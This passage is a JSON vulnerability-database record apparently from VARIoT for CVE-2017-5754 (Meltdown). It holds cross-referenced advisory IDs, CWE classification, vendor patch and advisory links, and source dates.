"https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-5754", "trust": 5.6 }, { "db": "CERT/CC", "id": "VU#584653", "trust": 3.8 }, { "db": "BID", "id": "102378", "trust": 2.0 }, { "db": "CERT/CC", "id": "VU#180049", "trust": 1.9 }, { "db": "BID", "id": "106128", "trust": 1.4 }, { "db": "SECTRACK", "id": "1040071", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-608355", "trust": 1.1 }, { "db": "LENOVO", "id": "LEN-18282", "trust": 1.1 }, { "db": "CERT@VDE", "id": "VDE-2018-003", "trust": 1.1 }, { "db": "CERT@VDE", "id": "VDE-2018-002", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93823979", "trust": 1.1 }, { "db": "USCERT", "id": "TA18-141A", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU98137233", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU94630516", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU99752892", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-23-075-01", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-23-257-04", "trust": 0.8 }, { "db": "CERT/CC", "id": "VU#155143", "trust": 0.8 }, { "db": "ICS CERT ALERT", "id": "ICS-ALERT-18-011-01A", "trust": 0.8 }, { "db": "USCERT", "id": "TA18-004A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-001001", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2018-00303", "trust": 0.6 }, { "db": "ICS CERT ALERT", "id": "ICS-ALERT-18-011-01E", "trust": 0.3 }, { "db": "ICS CERT ALERT", "id": "ICS-ALERT-18-011-01C", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10842", "trust": 0.3 }, { "db": "SIEMENS", "id": "SSA-168644", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "146067", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "145824", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145794", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145804", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145836", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145796", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145795", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145695", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145811", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145810", "trust": 0.1 }, { "db": "CNNVD", "id": "CNNVD-201801-151", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-113957", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "147543", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145641", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145793", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "146771", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145658", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145666", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150083", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "147582", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CERT/CC", "id": "VU#584653" }, { "db": "CNVD", "id": "CNVD-2018-00303" }, { "db": "VULHUB", "id": "VHN-113957" }, { "db": "BID", "id": "102378" }, { "db": "BID", "id": "106128" }, { "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "db": "PACKETSTORM", "id": "147543" }, { "db": "PACKETSTORM", "id": "146067" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145793" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145658" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "150083" }, { "db": "PACKETSTORM", "id": "147582" }, { "db": "NVD", "id": "CVE-2017-5754" } ] }, "id": "VAR-201801-1711", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2018-00303" }, { "db": "VULHUB", "id": "VHN-113957" } ], "trust": 1.2946695793749998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-00303" } ] }, "last_update_date": "2024-07-23T20:13:15.740000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "\u201cWith speculative execution function \u00a0CPU\u00a0 side-channel attacks against", "trust": 0.8, "url": "https://www.amd.com/en/corporate/speculative-execution" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-001001" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.1 }, { "problemtype": "information leak (CWE-200) [NVD evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-113957" }, { "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "db": "NVD", "id": "CVE-2017-5754" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "http://www.kb.cert.org/vuls/id/584653" }, { "trust": 2.2, "url": "https://meltdownattack.com/" }, { "trust": 1.9, "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability" }, { "trust": 1.8, "url": "https://access.redhat.com/security/vulnerabilities/speculativeexecution" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/102378" }, { "trust": 1.6, "url": "https://vuls.cert.org/confluence/display/wiki/vulnerabilities+associated+with+cpu+speculative+execution" }, { "trust": 1.6, "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00115.html" }, { "trust": 1.6, "url": "https://support.apple.com//ht208394" }, { "trust": 1.6, "url": "http://www.dell.com/support/speculative-store-bypass" }, { "trust": 1.4, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180104-cpusidechannel" }, { "trust": 1.4, "url": "http://xenbits.xen.org/xsa/advisory-254.html" }, { "trust": 1.4, "url": "https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/" }, { "trust": 1.4, "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180002" }, { "trust": 1.4, "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us" }, { "trust": 1.4, "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "trust": 1.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5754" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201810-06" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/106128" }, { "trust": 1.1, "url": "https://www.kb.cert.org/vuls/id/180049" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4609" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4611" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4613" }, { "trust": 1.1, "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4614" }, { "trust": 1.1, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-001.txt" }, { "trust": 1.1, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2019-003.txt" }, { "trust": 1.1, "url": "https://aws.amazon.com/de/security/security-bulletins/aws-2018-013/" }, { "trust": 1.1, "url": "https://cdrdv2.intel.com/v1/dl/getcontent/685358" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-608355.pdf" }, { "trust": 1.1, "url": "https://cert.vde.com/en-us/advisories/vde-2018-002" }, { "trust": 1.1, "url": "https://cert.vde.com/en-us/advisories/vde-2018-003" }, { "trust": 1.1, "url": "https://help.ecostruxureit.com/display/public/uadce725/security+fixes+in+struxureware+data+center+expert+v7.6.0" }, { "trust": 1.1, "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes" }, { "trust": 1.1, "url": "https://security.netapp.com/advisory/ntap-20180104-0001/" }, { "trust": 1.1, "url": "https://source.android.com/security/bulletin/2018-04-01" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx231399" }, { "trust": 1.1, "url": "https://support.citrix.com/article/ctx234679" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k91229003" }, { "trust": 1.1, "url": "https://support.lenovo.com/us/en/solutions/len-18282" }, { "trust": 1.1, "url": "https://www.codeaurora.org/security-bulletin/2018/07/02/july-2018-code-aurora-security-bulletin" }, { "trust": 1.1, "url": "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-18-0001" }, { "trust": 1.1, "url": "https://www.suse.com/c/suse-addresses-meltdown-spectre-vulnerabilities/" }, { "trust": 1.1, "url": "https://www.synology.com/support/security/synology_sa_18_01" }, { "trust": 1.1, "url": "https://www.debian.org/security/2018/dsa-4078" }, { "trust": 1.1, "url": "https://www.debian.org/security/2018/dsa-4082" }, { "trust": 1.1, "url": "https://www.debian.org/security/2018/dsa-4120" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-18:03.speculative_execution.asc" }, { "trust": 1.1, "url": "https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html" }, { "trust": 1.1, "url": "https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html" }, { "trust": 1.1, "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "trust": 1.1, "url": "https://lists.debian.org/debian-lts-announce/2018/01/msg00004.html" }, { "trust": 1.1, "url": "https://access.redhat.com/errata/rhsa-2018:0292" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1040071" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00006.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00007.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00008.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00014.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00016.html" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/usn/usn-3516-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/usn/usn-3522-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3522-3/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3522-4/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3523-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/usn/usn-3523-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/usn/usn-3524-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/usn/usn-3525-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3540-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3541-2/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3583-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3597-1/" }, { "trust": 1.1, "url": "https://usn.ubuntu.com/3597-2/" }, { "trust": 1.1, "url": "http://jvn.jp/vu/jvnvu93823979/index.html" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5715" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5753" }, { "trust": 1.0, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03871en_us" }, { "trust": 0.8, "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1528" }, { "trust": 0.8, "url": "https://developer.amd.com/wp-content/resources/124441_amd64_speculativestorebypassdisable_whitepaper_final.pdf" }, { "trust": 0.8, "url": "https://www.us-cert.gov/ncas/alerts/ta18-141a" }, { "trust": 0.8, "url": "http://cwe.mitre.org/data/definitions/208.html" }, { "trust": 0.8, "url": "https://software.intel.com/sites/default/files/managed/c5/63/336996-speculative-execution-side-channel-mitigations.pdf" }, { "trust": 0.8, "url": "https://software.intel.com/sites/default/files/managed/b9/f9/336983-intel-analysis-of-speculative-execution-side-channels-white-paper.pdf" }, { "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180521-cpusidechannel" }, { "trust": 0.8, "url": "https://fortiguard.com/psirt/fg-ir-18-002" }, { "trust": 0.8, "url": "https://support.hp.com/us-en/document/c06001626" }, { "trust": 0.8, "url": "http://www.hitachi.com/hirt/publications/hirt-pub18001/" }, { "trust": 0.8, "url": "https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/" }, { "trust": 0.8, "url": "https://docs.microsoft.com/en-us/cpp/security/developer-guidance-speculative-execution" }, { "trust": 0.8, "url": "https://access.redhat.com/security/vulnerabilities/ssbd" }, { "trust": 0.8, "url": "https://www.suse.com/support/kb/doc/?id=7022937" }, { "trust": 0.8, "url": "https://www.synology.com/en-global/support/security/synology_sa_18_23" }, { "trust": 0.8, "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/variant4" }, { "trust": 0.8, "url": "https://kb.vmware.com/s/article/54951" }, { "trust": 0.8, "url": "https://aws.amazon.com/security/security-bulletins/aws-2018-015/" }, { "trust": 0.8, "url": "cve-2017-5715 " }, { "trust": 0.8, "url": "cve-2017-5753 " }, { "trust": 0.8, "url": "cve-2017-5754 " }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu94630516/" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu99752892/index.html" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu98137233/" }, { "trust": 0.8, "url": "https://www.us-cert.gov/ncas/alerts/ta18-004a" }, { "trust": 0.8, "url": "https://kb.cert.org/vuls/id/155143" }, { "trust": 0.8, "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-075-01" }, { "trust": 0.8, "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-257-04" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01a" }, { "trust": 0.8, "url": "http://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html" }, { "trust": 0.8, "url": "https://googleprojectzero.blogspot.jp/2018/01/reading-privileged-memory-with-side.html" }, { "trust": 0.7, "url": "https://access.redhat.com/security/cve/cve-2017-5754" }, { "trust": 0.6, "url": "https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates/" }, { "trust": 0.4, "url": "https://access.redhat.com/errata/rhsa-2018:0008" }, { "trust": 0.4, "url": "https://access.redhat.com/errata/rhsa-2018:0016" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.4, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.3, "url": "http://www.amd.com/en-gb" }, { "trust": 0.3, "url": "https://www.arm.com/" }, { "trust": 0.3, "url": "http://www.intel.com/content/www/us/en/homepage.html" }, { "trust": 0.3, "url": "https://newsroom.intel.com/news/intel-responds-to-security-research-findings/" }, { "trust": 0.3, "url": "https://lwn.net/articles/738975/" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10842\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://support.apple.com/en-us/ht208394" }, { "trust": 0.3, "url": "https://www.chromium.org/home/chromium-security/ssca" }, { "trust": 0.3, "url": "https://www.amd.com/en/corporate/speculative-execution" }, { "trust": 0.3, "url": "https://source.android.com/security/bulletin/2018-01-01" }, { "trust": 0.3, "url": "https://lists.apple.com/archives/security-announce/2018/jan/msg00001.html" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1519781" }, { "trust": 0.3, "url": "https://support.google.com/faqs/answer/7622138" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/spectre_meltdown_advisory.asc" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01c" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01e" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/120" }, { "trust": 0.3, "url": "https://www.reddit.com/r/linux/comments/7npnd4/kernel_41411_is_out_with_patches_for_intel_cpu/" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 0.3, "url": "https://www.oracle.com/technetwork/topics/security/ovmbulletinapr2018-4431088.html" }, { "trust": 0.3, "url": "http://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletin-for-meltdown-and-spectre-update-1" }, { "trust": 0.3, "url": "https://googleprojectzero.blogspot.in/2018/01/reading-privileged-memory-with-side.html" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0007" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0009" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0010" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0011" }, { "trust": 0.3, "url": "https://access.redhat.com/errata/rhsa-2018:0017" }, { "trust": 0.3, "url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa161" }, { "trust": 0.3, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-168644.pdf" }, { "trust": 0.3, "url": "https://chromereleases.googleblog.com/2018/03/stable-channel-update-for-chrome-os_19.html" }, { "trust": 0.3, "url": "https://lists.vmware.com/pipermail/security-announce/2018/000397.html" }, { "trust": 0.3, "url": "https://www.vmware.com/security/advisories/vmsa-2018-0007.html" }, { "trust": 0.3, "url": "https://developer.arm.com/support/security-update" }, { "trust": 0.3, "url": "http://code.google.com/android/" }, { "trust": 0.3, "url": "http://www.qualcomm.com/" }, { "trust": 0.3, "url": "https://source.android.com/security/bulletin/2018-12-01.html" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-5753" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-5715" }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03871en_us" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-8897" }, { "trust": 0.1, "url": "https://access.redhat.com/security/vulnerabilities/pop_ss" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-8897" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2018:1351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4097" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4084" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4094" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4088" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4092" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-8817" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4098" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4093" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4096" }, { "trust": 0.1, "url": "https://support.apple.com/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4090" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4091" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4085" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4086" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4082" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4089" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-4100" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17864" }, { "trust": 0.1, "url": "https://www.ubuntu.com/usn/usn-3523-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17863" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16995" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17862" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-25.29" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3523-1," }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3541-1," }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-37.42" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.13.0-1015.16" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3597-1," }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2018:0022" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5244" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7542" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12892" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10471" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12891" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12893" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10982" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15469" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10472" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3620" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10981" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15468" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3646" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15470" }, { "trust": 0.1, "url": "https://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7541" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7540" }, { "trust": 0.1, "url": "https://www.microfocus.com/support-and-services/report-security" }, { "trust": 0.1, "url": "https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification" }, { "trust": 0.1, "url": "https://cf.passport.softwaregrp.com/hppcf/createuser.do" }, { "trust": 0.1, "url": "https://softwaresupport.hpe.com/security-vulnerability" }, { "trust": 0.1, "url": "https://softwaresupport.hpe.com/document/-/facetsearch/document/km03158629" } ], "sources": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CERT/CC", "id": "VU#584653" }, { "db": "CNVD", "id": "CNVD-2018-00303" }, { "db": "VULHUB", "id": "VHN-113957" }, { "db": "BID", "id": "102378" }, { "db": "BID", "id": "106128" }, { "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "db": "PACKETSTORM", "id": "147543" }, { "db": "PACKETSTORM", "id": "146067" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145793" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145658" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "150083" }, { "db": "PACKETSTORM", "id": "147582" }, { "db": "NVD", "id": "CVE-2017-5754" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#180049" }, { "db": "CERT/CC", "id": "VU#584653" }, { "db": "CNVD", "id": "CNVD-2018-00303" }, { "db": "VULHUB", "id": "VHN-113957" }, { "db": "BID", "id": "102378" }, { "db": "BID", "id": "106128" }, { "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "db": "PACKETSTORM", "id": "147543" }, { "db": "PACKETSTORM", "id": "146067" }, { "db": "PACKETSTORM", "id": "145641" }, { "db": "PACKETSTORM", "id": "145793" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "145658" }, { "db": "PACKETSTORM", "id": "145666" }, { "db": "PACKETSTORM", "id": "150083" }, { "db": "PACKETSTORM", "id": "147582" }, { "db": "NVD", "id": "CVE-2017-5754" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-21T00:00:00", "db": "CERT/CC", "id": "VU#180049" }, { "date": "2018-01-04T00:00:00", "db": "CERT/CC", "id": "VU#584653" }, { "date": "2018-01-04T00:00:00", "db": "CNVD", "id": "CNVD-2018-00303" }, { "date": "2018-01-04T00:00:00", "db": "VULHUB", "id": "VHN-113957" }, { "date": "2018-01-03T00:00:00", "db": "BID", "id": "102378" }, { "date": "2018-12-03T00:00:00", "db": "BID", "id": "106128" }, { "date": "2018-01-04T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "date": "2018-05-08T23:54:17", "db": "PACKETSTORM", "id": "147543" }, { "date": "2018-01-24T16:59:41", "db": "PACKETSTORM", "id": "146067" }, { "date": "2018-01-04T01:20:35", "db": "PACKETSTORM", "id": "145641" }, { "date": "2018-01-10T00:58:04", "db": "PACKETSTORM", "id": "145793" }, { "date": "2018-03-15T15:54:32", "db": "PACKETSTORM", "id": "146771" }, { "date": "2018-01-04T17:52:00", "db": "PACKETSTORM", "id": "145658" }, { "date": "2018-01-04T17:53:07", "db": "PACKETSTORM", "id": "145666" }, { "date": "2018-10-31T01:14:40", "db": "PACKETSTORM", "id": "150083" }, { "date": "2018-05-10T23:27:00", "db": "PACKETSTORM", "id": "147582" }, { "date": "2018-01-04T13:29:00.303000", "db": "NVD", "id": "CVE-2017-5754" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-06-19T00:00:00", "db": "CERT/CC", "id": "VU#180049" }, { "date": "2022-01-07T00:00:00", "db": "CERT/CC", "id": "VU#584653" }, { "date": "2018-01-11T00:00:00", "db": "CNVD", "id": "CNVD-2018-00303" }, { "date": "2021-11-19T00:00:00", "db": "VULHUB", "id": "VHN-113957" }, { "date": "2019-04-17T07:00:00", "db": "BID", "id": "102378" }, { "date": "2018-12-03T00:00:00", "db": "BID", "id": "106128" }, { "date": "2024-04-11T06:49:00", "db": "JVNDB", "id": "JVNDB-2018-001001" }, { "date": "2021-11-19T18:15:08.547000", "db": "NVD", "id": "CVE-2017-5754" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "102378" }, { "db": "PACKETSTORM", "id": "145793" }, { "db": "PACKETSTORM", "id": "146771" }, { "db": "PACKETSTORM", "id": "147582" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks", "sources": [ { "db": "CERT/CC", "id": "VU#180049" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "102378" } ], "trust": 0.3 } }
var-201605-0037
Vulnerability from variot
